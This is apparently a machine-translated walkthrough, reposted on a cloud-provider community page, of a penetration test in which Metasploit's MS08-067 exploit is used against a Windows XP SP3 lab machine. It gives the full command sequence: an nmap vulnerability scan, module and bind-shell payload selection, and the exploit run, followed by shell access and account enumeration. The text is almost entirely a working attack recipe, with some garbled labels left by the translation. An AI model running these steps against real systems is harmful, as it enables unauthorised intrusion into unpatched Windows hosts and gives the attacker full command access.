ms08-067 Vulnerability Remote overflow intrusion test

Source: Internet
Author: User

Attackers IP Address: 192.168.9.4, operating system Windows XP SP3 中文版

Attacker IP Address: 192.168.9.1

View Database Connection Status

MSF > Db_status
[*] PostgreSQL connected to MSF3

Using NMAP to scan target machines
MSF > Db_nmap-ss-sv-o--script=smb-check-vulns.nse-n 192.168.9.4
[*] Nmap:starting Nmap 5.61test4 (http://nmap.org) at 2012-09-25 11:01
[*] Nmap:nmap Scan for 192.168.9.4
[*] Nmap:host is up (0.00s latency).
[*] Nmap:not shown:997 closed ports
[*] Nmap:port State SERVICE VERSION
[*] Nmap:135/tcp Open MSRPC Microsoft Windows RPC
[*] NMAP:139/TCP Open NETBIOS-SSN
[*] NMAP:445/TCP Open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap:mac address:00:0c:29:43:d6:5f (VMware)
[*] Nmap:device type:general Purpose
[*] Nmap:Running:Microsoft Windows xp|2003
[*] Nmap:os Cpe:cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap:os details:microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap:network distance:1 Hop
[*] Nmap:service Info:OS:Windows; Cpe:cpe:/o:microsoft:windows
[*] Nmap:host Script Results:
[*] Nmap: | Smb-check-vulns:
[*]   Nmap: | Ms08-067:vulnerable
[*]   Nmap: | conficker:likely Clean
[*]   Nmap: | Regsvc dos:check DISABLED (add '--script-args=unsafe=1 ' to run)
[*]   Nmap: | SMBv2 DoS (cve-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1 ' to run)
[*]   Nmap: | Ms06-025:check DISABLED (remove ' safe=1 ' argument to run)
[*] Nmap: |_ ms07-029:check DISABLED (remove ' safe=1 ' argument to run)
[*] Nmap:os and Service detection performed. Please incorrect results athttp://nmap.org/submit/.
[*] Nmap:nmap done:1 IP Address (1 host up) scanned in 10.28 seconds

Find ms08_067 Vulnerabilities

MSF > Search ms08_067

Matching Modules
================

Name Disclosure Date Rank Description
----                                 ---------------          ----   -----------
Exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service relative Path Stack corrupti On

Using the ms08_067 vulnerability
MSF > Use EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI

Set remote address, forward connection
MSF exploit (MS08_067_NETAPI) > Set rhost 192.168.9.4
Rhost => 192.168.9.4

Set Shellcode
MSF exploit (MS08_067_NETAPI) > Set Payload windows/shell_bind_tcp
Payload => windows/shell_bind_tcp

Show options for configuration
MSF exploit (MS08_067_NETAPI) > Show options

Module Options (EXPLOIT/WINDOWS/SMB/MS08_067_NETAPI):

Name Current Setting Required Description
----     ---------------  --------  -----------
Rhost 192.168.9.4 Yes the target address
Rport 445 Yes Set the SMB service port
Smbpipe BROWSER Yes the pipe name to use (BROWSER, srvsvc)


Payload Options (WINDOWS/SHELL_BIND_TCP):

Name Current Setting Required Description
----      ---------------  --------  -----------
Exitfunc thread Yes Exit Technique:seh, thread, process, none
Lport 4444 Yes the listen port
Rhost 192.168.9.4 no The target address


Exploit target:

Id Name
--  ----
0 Automatic Targeting

Expliot
MSF exploit (MS08_067_NETAPI) > Exploit
[*] Started bind handler
[*] Automatically detecting the target ...
[*] Fingerprint:windows Xp-service Pack 3-lang:english
[*] Selected target:windows XP SP3 中文版 (AlwaysOn NX)
[*] Attempting to trigger the vulnerability ...
[*] Command Shell Session 1 opened (192.168.9.1:1126-> 192.168.9.4:4444) at 2012-09-25 11:04:31 +0800

Successfully returned to Shell

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\windows\system32>net User
NET user

User accounts for \ \

-------------------------------------------------------------------------------
Administrator Guest Hacker
HelpAssistant Support_388945a0
The command completed with one or more errors.

--------------------------------------------------------------------------------------------------------------- ---------

If you want the vulnerability to support what operating system, you can enter the info command, you can see the details about the vulnerability.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.